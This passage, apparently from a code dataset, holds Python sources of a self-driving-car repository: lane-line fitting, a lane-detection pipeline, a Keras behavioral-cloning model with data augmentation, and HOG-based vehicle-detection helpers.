#ax.imshow(out_img)\n #ax.plot(left_fitx, ploty, color='yellow')\n #ax.plot(right_fitx, ploty, color='yellow')\n #return left_fitx, right_fitx, ploty\n return left_fit, right_fit\n \ndef usePrevSlide(binary_warped, left_fit, right_fit,lanes):\n # Assume you now have a new warped binary image \n # from the next frame of video (also called \"binary_warped\")\n # It's now much easier to find line pixels!\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n margin = 100\n left_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + \n left_fit[2] - margin)) & (nonzerox < (left_fit[0]*(nonzeroy**2) + \n left_fit[1]*nonzeroy + left_fit[2] + margin))) \n\n right_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + \n right_fit[2] - margin)) & (nonzerox < (right_fit[0]*(nonzeroy**2) + \n right_fit[1]*nonzeroy + right_fit[2] + margin))) \n\n # Again, extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds] \n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n\n 
# Fit a second order polynomial to each\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n # Generate x and y values for plotting\n ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0] )\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n # Create an image to draw on and an image to show the selection window\n out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n window_img = np.zeros_like(out_img)\n lane_img = np.zeros_like(out_img)\n # Color in left and right line pixels\n lane_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n lane_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n # Generate a polygon to illustrate the search window area\n # And recast the x and y points into usable format for cv2.fillPoly()\n left_line_window1 = np.array([np.transpose(np.vstack([left_fitx-margin, ploty]))])\n left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx+margin, \n ploty])))])\n left_line_pts = np.hstack((left_line_window1, left_line_window2))\n right_line_window1 = np.array([np.transpose(np.vstack([right_fitx-margin, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx+margin, \n ploty])))])\n left_line_window1 = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx, \n ploty])))])\n right_line_pts = np.hstack((right_line_window1, right_line_window2))\n all_line_pts = np.hstack((left_line_window1, right_line_window2))\n cv2.fillPoly(window_img, np.int_([all_line_pts]), (0,255, 0))\n result = cv2.addWeighted(lane_img, 1, window_img, 1, 0)\n \n \n y_eval = np.max(ploty)\n left_curverad = ((1 + (2*left_fit[0]*y_eval + left_fit[1])**2)**1.5) / np.absolute(2*left_fit[0])\n right_curverad = ((1 + (2*right_fit[0]*y_eval + right_fit[1])**2)**1.5) / np.absolute(2*right_fit[0])\n ym_per_pix = 30/720 # meters per pixel in y dimension\n xm_per_pix = 3.7/700 # meters per pixel in x dimension\n \n # Fit new polynomials to x,y in world space\n left_fit_cr = np.polyfit(ploty*ym_per_pix, left_fitx*xm_per_pix, 2)\n right_fit_cr = np.polyfit(ploty*ym_per_pix, right_fitx*xm_per_pix, 2)\n # Calculate the new radii of curvature\n left_curverad = ((1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])\n right_curverad = ((1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])\n # Now our radius of curvature is in meters\n lanes.left_curverad = left_curverad\n lanes.right_curverad = right_curverad\n #fig, ax = plt.subplots()\n #ax.imshow(out_img)\n #ax.plot(left_fitx, ploty, color='yellow')\n #ax.plot(right_fitx, ploty, color='yellow')\n return result , left_fit, right_fit" }, { "alpha_fraction": 0.6155717968940735, "alphanum_fraction": 0.645255446434021, "avg_line_length": 38.53845977783203, "blob_id": "2024ebd66c32bd5712314105d4e6db95399beca5", "content_id": "074b837ab3dce14d0063b323a001250d032a7ad4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2055, "license_type": "no_license", "max_line_length": 113, "num_lines": 52, "path": "/CarND-Advanced-Lane-Lines/pipeline.py", "repo_name": "KyleGrier/self-driving", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport 
matplotlib.image as mpimg\nimport glob\nfrom helper import warp, getSobelBinaryX, getSobelBinaryY, getSobelX, \\\n getSobelY, getSobelDirection, getSatBinary, combineBinary, windSlide, usePrevSlide, calibrate\n\n\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\ntopLeftCornerOfText = (10,100)\nfontScale = 1\nfontColor = (255,255,255)\nlineType = 2\ndef pipeline(img, objpoints, imgpoints,lanes):\n #Preprocess to create warped img\n img = calibrate(img, objpoints, imgpoints)\n img_size = (img.shape[1], img.shape[0])\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n s_channel = hls[:,:,2]\n combined = s_channel* 0.6 + gray * 0.4\n combined = np.array( combined).astype ('uint8')\n blurf = np.zeros((1, 5))\n blurf.fill (1)\n combined = cv2.filter2D(combined, cv2.CV_32F, blurf)\n f = np.zeros((1, 30))\n f.fill (1)\n l = cv2.morphologyEx(combined, cv2.MORPH_OPEN, f)\n combined = combined - l\n combined = getSobelBinaryX(combined, sobel_kernel = 15, thresh_min = 190, thresh_max=255)\n binary_warped, minv = warp(combined)\n # Do window search or optimized window search using previous lanes\n \n # Unwarp the shaded lanes and apply to the calibrated image\n \n # Update the lane classes\n # Draw the lane onto the warped blank image\n if lanes.detected == False:\n lanes.left_fit, lanes.right_fit = windSlide(binary_warped)\n lanes.detected = True\n result, lanes.left_fit, lanes.right_fit = usePrevSlide(binary_warped, lanes.left_fit, lanes.right_fit, lanes)\n warpy = cv2.warpPerspective(result, minv, img_size, flags=cv2.INTER_LINEAR)\n final = cv2.addWeighted(img, 1, warpy, 1, 0)\n #cv2.putText(final,'Hello World!{}'.format(lanes.left_curverad),\n # topLeftCornerOfText, \n # font, \n # fontScale,\n # fontColor,\n # lineType)\n return final" }, { "alpha_fraction": 0.5281625390052795, "alphanum_fraction": 0.5533702969551086, "avg_line_length": 34.04854202270508, "blob_id": "286bdbe289797ae28072aff19804edc5788c0e25", "content_id": "83511257ccce465046cd9a713daef5204658e824", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10830, "license_type": "no_license", "max_line_length": 167, "num_lines": 309, "path": "/CarND-Behavioral-Cloning-P3/modeling.py", "repo_name": "KyleGrier/self-driving", "src_encoding": "UTF-8", "text": "import csv\nimport cv2\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Convolution2D\nfrom keras.optimizers import Adam\nfrom random import shuffle\nfrom sklearn.model_selection import train_test_split\nimport sklearn\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport seaborn as sns\nimport os\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\npath = \"../Data/driving_log.csv\"\n\ndef getSamples():\n samples = []\n with open('data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n samples.append(line)\n with open('data/new_img/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n samples.append(line)\n with open('data/adjust/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n samples.append(line)\n with open('data/data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n samples.append(line)\n print(len(samples))\n shuffle(samples)\n train_samples, validation_samples = train_test_split(samples, test_size=0.2)\n return train_samples, 
validation_samples\n\n#Keras model derived from the Nvidia report \ndef nvidiaModel():\n model = Sequential()\n\n model.add(Lambda(lambda x: x/127.5 - 1, input_shape=(160, 320, 3)))\n #Remove top 50 pixels and the bottom 25 pixels. Don't drop sides.\n model.add(Cropping2D(cropping=((50, 25), (0,0))))\n model.add(Convolution2D(24, 5, strides=(2, 2), activation='relu'))\n model.add(Convolution2D(36, 5, strides=(2, 2), activation='relu'))\n model.add(Convolution2D(48, 5, strides=(2, 2), activation='relu'))\n model.add(Convolution2D(64, 3, activation='relu'))\n model.add(Convolution2D(64, 3, activation='relu'))\n\n model.add(Flatten())\n\n model.add(Dense(100))\n model.add(Dense(50))\n model.add(Dense(10))\n model.add(Dense(1))\n opt = Adam(lr=0.0001)\n model.compile(loss='mse', optimizer=opt)\n\n return model\n\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n images = []\n angles = []\n for batch_sample in batch_samples:\n #angle = float(batch_sample[3])\n #if abs(angle) < 0.05:\n # use_zero = np.random.randint(5)\n # if use_zero == 1:\n # img, angle = imageProcessing(batch_sample) \n # images.append(img)\n # angles.append(angle)\n #else:\n img, angle = imageProcessing(batch_sample) \n images.append(img)\n angles.append(angle)\n X_train = np.array(images)\n y_train = np.array(angles)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n\ndef imageProcessing(sample, cutoff= 0.33):\n angle = float(sample[3])\n\n #To remove zero angle bias\n # if(abs(angle) < 0.05):\n # cutoff = 0.1\n mid_cutoff = (1-cutoff)/2 + cutoff\n\n #Test in order to incorporate udacity data which has a different path setup\n sp = None\n u_or_m = len(sample[0].split(\"\\\\\"))\n if (u_or_m > 1):\n sp = \"\\\\\"\n else:\n sp = '/'\n\n # Randomly pick between left, right, and center image with weighting to handle\n # zero angle bias.\n pick_camera = np.random.uniform()\n img_path = None\n\n #Use the center image\n if pick_camera <= cutoff:\n img_path = './data/IMG/' + sample[0].split(sp)[-1]\n # Use the left image\n elif pick_camera > cutoff and pick_camera <= mid_cutoff:\n img_path = './data/IMG/' + sample[1].split(sp)[-1]\n angle += 0.1\n # Use the right image\n else:\n img_path = './data/IMG/' + sample[2].split(sp)[-1]\n angle += -0.1\n\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n pick_flip = np.random.randint(2)\n if pick_flip == 1:\n img = cv2.flip(img, 1)\n angle *= -1\n\n pick_bright = np.random.randint(2)\n if pick_bright == 1:\n img = augmentBrightness(img)\n return img, angle\n\ndef augmentBrightness(img):\n img_hsv = cv2.cvtColor(img,cv2.COLOR_RGB2HSV)\n img_hsv = np.array(img_hsv, dtype = np.float64)\n rand_bright = 2 * np.random.uniform()\n img_hsv[:,:,2] = img_hsv[:, :, 2] * rand_bright\n img_hsv[:,:,2][img_hsv[:,:,2]>255] = 255\n img_hsv = np.array(img_hsv, dtype = np.uint8)\n img_aug = cv2.cvtColor(img_hsv,cv2.COLOR_HSV2RGB)\n return img\n\n\n#############################################################\n#############################################################\n#############################################################\n#############################################################\n\n\n\nif __name__ == \"__main__\":\n train_samples, valid_samples = getSamples()\n train_generator = generator(train_samples, batch_size=128)\n valid_generator = generator(valid_samples, 
batch_size=128)\n train_steps = (len(train_samples) // 128) + 1 \n valid_steps = (len(valid_samples) // 128) + 1 \n model = nvidiaModel()\n history_object = model.fit_generator(train_generator, steps_per_epoch=train_steps, \n validation_data=valid_generator, validation_steps = valid_steps, epochs=3,\n verbose = 1)\n model.save('model2.h5')\n plt.plot(history_object.history['loss'])\n plt.plot(history_object.history['val_loss'])\n plt.title('model mean squared error loss')\n plt.ylabel('mean squared error loss')\n plt.xlabel('epoch')\n plt.legend(['training set', 'validation set'], loc='upper right')\n plt.savefig('loss.png')\n\n\n\n\n\n\n#######################################################################################################################################################################\n#############################################################\n#############################################################\n############## HELPER FUNCTIONS #######################\n#############################################################\n#######################################################################################################################################################################\n\n# Small generator to test generator mechanics\ndef smallGenerator(samples, batch_size=32):\n samples = samples[0:72]\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n images = []\n angles = []\n for batch_sample in batch_samples:\n name = './data/IMG/' + batch_sample[0].split(\"\\\\\")[-1]\n center_image = cv2.imread(name)\n center_angle = float(batch_sample[3])\n images.append(center_image)\n angles.append(center_angle)\n # trim image to only see section with road\n X_train = np.array(images)\n y_train = np.array(angles)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n#A test of 3 images to determine if a model can learn a simple sample size.\ndef testModel(model):\n ex_neg = \"data/IMG/center_2017_11_18_16_00_07_045.jpg\"\n ex_neg_lab = -0.3743682\n ex_zero = \"data/IMG/center_2017_11_18_16_00_13_544.jpg\"\n ex_zero_lab = 0\n ex_pos = \"data/IMG/center_2017_11_18_16_00_14_701.jpg\"\n ex_pos_lab = 0.3366786\n ex = [ex_neg, ex_zero, ex_pos]\n X = np.array([plt.imread(img) for img in ex])\n y = np.array([ex_neg_lab, ex_zero_lab, ex_pos_lab])\n model.fit(X, y, epoch=100)\n score = model.evaluate(X, y)\n print(score)\n\n# Test straightness of samples\ndef straightness():\n samples = []\n with open('data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n samples.append(line)\n straight = 0\n turn = 0\n for sample in samples:\n if float(sample[3]) == 0.0:\n straight += 1\n else:\n turn += 1\n print(\"Samples include {} straight images and {} turn images\".format(staight, turn))\n\n#Show the different augmented images\ndef plotSamples(gen):\n fig, ax1 = plt.subplots(figsize=(15,15))\n gs_all = gridspec.GridSpec(9, 5)\n gs_all.update(wspace=0.3, hspace=0.3)\n i = 0\n x_train, y_train = next(gen)\n samples = zip(x_train, y_train)\n for img, ang in samples:\n gs = gridspec.GridSpecFromSubplotSpec(1, 1, subplot_spec=gs_all[i])\n ax = plt.subplot(gs[0])\n ax.get_xaxis().set_ticks([])\n ax.get_yaxis().set_visible(False)\n ax.imshow(img)\n ax.set_xlabel(str(ang))\n i += 1\n plt.show()\n\ndef stats(gen):\n # iterate through samples in generator and record angles\n angles = list()\n for _, y_train in 
gen:\n angles.append(y_train)\n f, ax = plt.subplot(figsize=(10,12))\n sns.distplot(x)\n\ndef removeFiles(folder, the_df):\n files = os.listdir(path + folder)\n print(len(files))\n to_remove = []\n for file in files:\n search = \".*\" + file\n idx_df = df[df[\"center\"].str.contains(search)]\n to_remove.append(idx_df.index.values[0])\n indexes_to_keep = set(range(the_df.shape[0])) - set(to_remove)\n df_sliced = the_df.take(list(indexes_to_keep))\n print(df_sliced.shape[0])\n print(the_df.shape[0])\n return df_sliced\n\ndef getBridgecsv(folder):\n files = os.listdir(path + folder)\n print(len(files))\n to_get = None\n for file in files:\n search = \".*\" + file\n idx_df = df[df[\"center\"].str.contains(search)]\n if to_get is None:\n to_get = idx_df\n else:\n to_get = pd.concat([to_get, idx_df])\n \n to_get.to_csv(path_or_buf =\"data/bridge.csv\", index=False, header=False)\n return\n\ndef angleStats(samples, batch_size=32):\n num_samples = len(samples)\n shuffle(samples)\n angles = []\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n for batch_sample in batch_samples:\n angle = float(batch_sample[3])\n if abs(angle) < 0.02:\n use_zero = np.random.randint(10)\n if use_zero == 1:\n img, angle = imageProcessing(batch_sample) \n angles.append(angle)\n else:\n img, angle = imageProcessing(batch_sample) \n angles.append(angle)\n sns.distplot(angles)\n" }, { "alpha_fraction": 0.546025276184082, "alphanum_fraction": 0.5650991797447205, "avg_line_length": 38.69682693481445, "blob_id": "e4bcc11ffb3d0ac066ab0be5d7f3be86c05a6843", "content_id": "d99218b544c50c85b0e1e2d1f29ddf0bcedc1ee6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25008, "license_type": "no_license", "max_line_length": 136, "num_lines": 630, "path": "/CarND-Vehicle-Detect/helper.py", "repo_name": "KyleGrier/self-driving", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom skimage.feature import hog\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nimport glob\nimport time\nfrom collections import deque\n\n\ndef getData(): \n # Read in cars and notcars\n # images = glob.glob('prac_img\\\\smallset/*/*/*.jpeg')\n images = glob.glob('dataset/**/*.png', recursive=True)\n cars = []\n notcars = []\n for image in images:\n if \"non-vehicles\" in image:\n notcars.append(image)\n else:\n cars.append(image)\n return cars, notcars\n\n# Define a function that takes an image, a list of bounding boxes, \n# and optional color tuple and line thickness as inputs\n# then draws boxes in that color on the output\ndef draw_boxes(img, bboxes, color=(0, 0, 255), thick=6):\n # make a copy of the image\n draw_img = np.copy(img)\n # draw each bounding box on your image copy using cv2.rectangle()\n for p1, p2 in bboxes:\n cv2.rectangle(draw_img, p1, p2, color, thick)\n # return the image copy with boxes drawn\n return draw_img\n\n# Define a function that takes an image, a list of bounding boxes, \n# and optional color tuple and line thickness as inputs\n# then draws boxes in that color on the output\ndef draw_boxes_visual(img, bboxes, color=(0, 0, 255), thick=6):\n # make a copy of the image\n draw_img = np.copy(img)\n # draw each bounding box on your image copy using cv2.rectangle()\n for p1, p2 in bboxes:\n clone = np.copy(img)\n cv2.rectangle(clone, p1, p2, color, 
thick)\n cv2.imshow(\"Window\", clone)\n cv2.waitKey(1)\n time.sleep(0.05)\n cv2.rectangle(draw_img, p1, p2, color, thick)\n # return the image copy with boxes drawn\n return draw_img\n\n# Convert from RGB to the specified color space\ndef color_config(img, cspace='RGB'):\n if cspace != 'RGB':\n if cspace == 'HSV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n elif cspace == 'LUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n elif cspace == 'HLS':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n elif cspace == 'YUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n elif cspace == 'YCrCb':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n else: feature_image = np.copy(img)\n return feature_image \n\ndef color_hist(img, nbins=32, bins_range=(0, 256)):\n # Compute the histogram of the channels separately\n channel1_hist = np.histogram(img[:,:,0], bins=nbins, range=bins_range)\n channel2_hist = np.histogram(img[:,:,1], bins=nbins, range=bins_range)\n channel3_hist = np.histogram(img[:,:,2], bins=nbins, range=bins_range)\n # Concatenate the histograms into a single feature vector\n hist_features = np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n # Return the individual histograms, bin_centers and feature vector\n return hist_features\n\ndef bin_spatial(img, color_space='RGB', size=(32, 32)):\n # Convert image to new color space (if specified)\n # Use cv2.resize().ravel() to create the feature vector\n img = color_config(img, cspace=color_space) \n img = cv2.resize(img, size)\n features = img.ravel()\n # Return the feature vector\n return features\n\n#Gets HOG features and can return a visualization\ndef get_hog_features(img, orient, pix_per_cell, cell_per_block, vis=False,\n feature_vec=True):\n \n \"\"\"\n Function accepts params and returns HOG features (optionally flattened) and an optional matrix for \n visualization. 
Features will always be the first return (flattened if feature_vector= True).\n A visualization matrix will be the second return if visualize = True.\n \"\"\"\n return hog(img, orientations=orient, pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block),\n block_norm= 'L2-Hys', transform_sqrt=False, \n visualise= vis, feature_vector= feature_vec)\n\n# Define a function to extract features from a list of images\n# Have this function call bin_spatial() and color_hist()\ndef extract_features(imgs, cspace='RGB', spatial_size=(32, 32),\n hist_bins=32, hist_range=(0, 256), hog_channel=\"ALL\",\n orient=9, pix_per_cell=8, cell_per_block=2,\n spatial_feat=True, hist_feat=True, hog_feat=True):\n # Create a list to append feature vectors to\n features = []\n # Iterate through the list of images\n for file in imgs:\n feat_list = []\n # Read in each one by one\n img = mpimg.imread(file)\n # apply color conversion if other than 'RGB'\n img = color_config(img, cspace=cspace) \n # Apply bin_spatial() to get spatial color features\n img = cv2.resize(img, (64, 64))\n rgb_img = color_config(img, cspace='RGB')\n #3) Compute spatial features if flag is set\n if spatial_feat == True:\n spat_feat = cv2.resize(rgb_img, spatial_size)\n spat_feat = spat_feat.ravel()\n feat_list.append(spat_feat)\n #5) Compute histogram features if flag is set\n if hist_feat == True:\n hist_features = color_hist(rgb_img, nbins=hist_bins)\n #6) Append features to list\n feat_list.append(hist_features)\n #7) Compute HOG features if flag is set\n if hog_feat == True:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(img.shape[2]):\n hog_features.append(get_hog_features(img[:,:,channel], \n orient, pix_per_cell, cell_per_block))\n hog_features = np.ravel(hog_features) \n else:\n hog_features = get_hog_features(img[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block)\n feat_list.append(hog_features)\n # Append the new feature vector to the features list\n if len(feat_list) == 1:\n features.append(feat_list[0])\n else:\n features.append(np.concatenate(feat_list))\n # Return list of feature vectors\n return features\n\n# Define a function to extract features from a single image window\n# This function is very similar to extract_features()\n# just for a single image rather than list of images\ndef single_img_features(img, cspace='RGB', spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=\"ALL\",\n spatial_feat=True, hist_feat=True, hog_feat=True): \n #1) Define an empty list to receive features\n img_features = []\n #2) Apply color conversion if other than 'RGB'\n feat_img = color_config(img, cspace=cspace)\n feat_img = cv2.resize(feat_img, (64, 64)) \n rgb_img = color_config(feat_img, cspace='RGB') \n #3) Compute spatial features if flag is set\n if spatial_feat == True:\n #4) Append features to list\n spat_feat = cv2.resize(rgb_img, spatial_size)\n spat_feat = spat_feat.ravel()\n img_features.append(spat_feat)\n #5) Compute histogram features if flag is set\n if hist_feat == True:\n hist_features = color_hist(rgb_img, nbins=hist_bins)\n #6) Append features to list\n img_features.append(hist_features)\n #7) Compute HOG features if flag is set\n if hog_feat == True:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feat_img.shape[2]):\n hog_features.append(get_hog_features(feat_img[:,:,channel], \n orient, pix_per_cell, cell_per_block))\n hog_features = np.ravel(hog_features) \n else:\n hog_features = 
get_hog_features(feat_img[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block)\n img_features.append(hog_features)\n if len(img_features) == 1:\n return np.array(img_features[0])\n else:\n #9) Return concatenated array of features\n return np.concatenate(img_features)\n\n \n# Define a function that takes an image,\n# start and stop positions in both x and y, \n# window size (x and y dimensions), \n# and overlap fraction (for both x and y)\ndef slide_window(img, x_start_stop=[None, None], y_start_stop=[None, None], \n xy_window=(64, 64), xy_overlap=(0.5, 0.5)):\n # If x and/or y start/stop positions not defined, set to image size\n if x_start_stop[0] == None:\n x_start_stop[0] = 0\n if x_start_stop[1] == None:\n x_start_stop[1] = img.shape[1]\n if y_start_stop[0] == None:\n y_start_stop[0] = 0\n if y_start_stop[1] == None:\n y_start_stop[1] = img.shape[0]\n # Compute the span of the region to be searched \n xspan = x_start_stop[1] - x_start_stop[0]\n yspan = y_start_stop[1] - y_start_stop[0]\n # Compute the number of pixels per step in x/y\n nx_pix_per_step = np.int(xy_window[0]*(1 - xy_overlap[0]))\n ny_pix_per_step = np.int(xy_window[1]*(1 - xy_overlap[1]))\n # Compute the number of windows in x/y\n nx_buffer = np.int(xy_window[0]*(xy_overlap[0]))\n ny_buffer = np.int(xy_window[1]*(xy_overlap[1]))\n nx_windows = np.int((xspan-nx_buffer)/nx_pix_per_step) \n ny_windows = np.int((yspan-ny_buffer)/ny_pix_per_step) \n # Initialize a list to append window positions to\n window_list = []\n # Loop through finding x and y window positions\n # Note: you could vectorize this step, but in practice\n # you'll be considering windows one by one with your\n # classifier, so looping makes sense\n for ys in range(ny_windows):\n for xs in range(nx_windows):\n # Calculate window position\n startx = xs*nx_pix_per_step + x_start_stop[0]\n endx = startx + xy_window[0]\n starty = ys*ny_pix_per_step + y_start_stop[0]\n endy = starty + xy_window[1]\n # Append window position to list\n window_list.append(((startx, starty), (endx, endy)))\n # Return the list of windows\n return window_list\n\n\n# Define a function you will pass an image \n# and the list of windows to be searched (output of slide_windows())\ndef search_windows(img, windows, clf, scaler, cspace='LUV', \n spatial_size=(64, 64), hist_bins=32, \n hist_range=(0, 256), orient=9, \n pix_per_cell=8, cell_per_block=2, \n hog_channel=\"ALL\", spatial_feat=False, \n hist_feat=True, hog_feat=True):\n\n #1) Create an empty list to receive positive detection windows\n on_windows = []\n #print(len(windows))\n #2) Iterate over all windows in the list\n for window in windows:\n #3) Extract the test window from original image\n test_img = img[window[0][1]:window[1][1], window[0][0]:window[1][0]] \n #4) Extract features for that window using single_img_features()\n features = single_img_features(test_img, cspace=cspace, orient=orient, pix_per_cell=pix_per_cell, cell_per_block=cell_per_block)\n #5) Scale extracted features to be fed to classifier\n test_features = scaler.transform(np.array(features).reshape(1, -1))\n #6) Predict using your classifier\n prediction = clf.predict(test_features)\n #7) If positive (prediction == 1) then save the window\n if prediction == 1:\n on_windows.append(window)\n #8) Return windows for positive detections\n #print(len(on_windows))\n return on_windows\n\ndef save_on_windows(img, windows, id, num):\n for i, window in enumerate(windows):\n filename = \"hard_negative/tosave{}.png\".format(str(id) + \"_\" + str(num) +\"_\"+ str(i))\n 
#3) Extract the test window from original image\n save_img = img[window[0][1]:window[1][1], window[0][0]:window[1][0]]\n save_img = (save_img*255.0).astype(\"uint8\")\n save_img = cv2.cvtColor(save_img, cv2.COLOR_RGB2BGR)\n cv2.imwrite(filename, save_img)\n\ndef add_heat(heatmap, bbox_list):\n # Iterate through list of bboxes\n for box in bbox_list:\n # Add += 1 for all pixels inside each bbox\n # Assuming each \"box\" takes the form ((x1, y1), (x2, y2))\n heatmap[box[0][1]:box[1][1], box[0][0]:box[1][0]] += 1\n\n # Return updated heatmap\n return heatmap# Iterate through list of bboxes\n\ndef apply_threshold(heatmap, threshold):\n # Zero out pixels below the threshold\n heatmap[heatmap <= threshold] = 0\n # Return thresholded map\n return heatmap\n\ndef draw_labeled_bboxes(img, labels):\n bboxes = []\n areas = []\n # Iterate through all detected cars\n for car_number in range(1, labels[1]+1):\n # Find pixels with each car_number label value\n nonzero = (labels[0] == car_number).nonzero()\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Define a bounding box based on min/max x and y\n bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n bboxes.append(bbox)\n area = Frame.get_area(bbox)\n areas.append(area)\n #Remove false positive\n new_areas = [] \n new_bbox = []\n for area, box in zip(areas,bboxes):\n if area > 2000:\n new_bbox.append(box)\n new_areas.append(area)\n areas = new_areas\n bboxes = new_bbox\n if(len(bboxes) > 2):\n small = None\n small_area = None \n for i, area in enumerate(areas):\n if small == None:\n small = i\n small_area = area\n elif(area < small_area):\n small_area = area\n small = i \n del areas[small]\n del bboxes[small] \n for area, box in zip(areas,bboxes):\n cv2.rectangle(img, box[0], box[1], (0,255,0), 6)\n # Iterate through all detected cars\n # for car_number in range(1, labels[1]+1):\n # # Find pixels with each car_number label value\n # nonzero = (labels[0] == car_number).nonzero()\n # # Identify x and y values of those pixels\n # nonzeroy = np.array(nonzero[0])\n # nonzerox = np.array(nonzero[1])\n # # Define a bounding box based on min/max x and y\n # bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n # print(Frame.get_area(bbox))\n # # Draw the box on the image\n # cv2.rectangle(img, bbox[0], bbox[1], (0,255,0), 6)\n # Return the image\n return img\n\n# class Containers():\n# def __init__(self):\n# # was the line detected in the last iteration?\n# frames = []\n# def add_frame(box):\n# new_frame = Frame()\n# new_frame.add_box(box)\n# frames.add(new_frame)\n\n# def add_boxes(boxes):\n# prosp_list = \n# frame_list = list(self.frames)\n# matches = []\n# for frame in frame_list:\n# best_fit = np.nan\n# best_dist = 0\n# for prosp in prosp_list:\n# if (best_fit is np.nan):\n# best_fit = prosp\n# best_dist = abs(frame.xmin - prosp[0][0])\n# else:\n# new_dist = abs(frame.xmin - prosp[0][0])\n# if new_dist < best_dist:\n# best_dist = new_dist\n# best_fit = prosp\n\n\n\nclass Frame():\n def __init__(self, outline):\n self.frames = deque()\n # Average area of boxes for the previous 5 labels.\n self.avg = 0\n self.max_avg = 0\n self.xmin = 0\n #the left most x value of the outlines\n self.left = 0\n # def add_box(box):\n # if box !\n # area = get_area(box)\n # self.frames.appendleft(area)\n # if (len(self.frames) > self.max_avg):\n # self.frames.pop() \n # self.avg = np.nanmean(self.frames)\n # if \n # self.xmin = box[0][0]\n def 
get_area(box):\n l = box[1][0] - box[0][0]\n h = box[1][1] - box[0][1]\n return l * h\n def get_xmin():\n return self.xmin\n def can_remove():\n return \n\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n#########################################################################\n\n\n\t\nif __name__ == \"__main__\":\n\t# performs under different binning scenarios\n\tspatial = 32\n\thistbin = 32\n\t# Define a labels vector based on features lists\n\ty = np.hstack((np.ones(len(car_features)), \n\t np.zeros(len(notcar_features))))\n\t# Create an array stack of feature vectors\n\tX = np.vstack((car_features, notcar_features)).astype(np.float64)\n\t# Split up data into randomized training and test sets\n\trand_state = np.random.randint(0, 100)\n\tX_train, X_test, y_train, y_test = train_test_split(\n \tX, y, test_size=0.2, 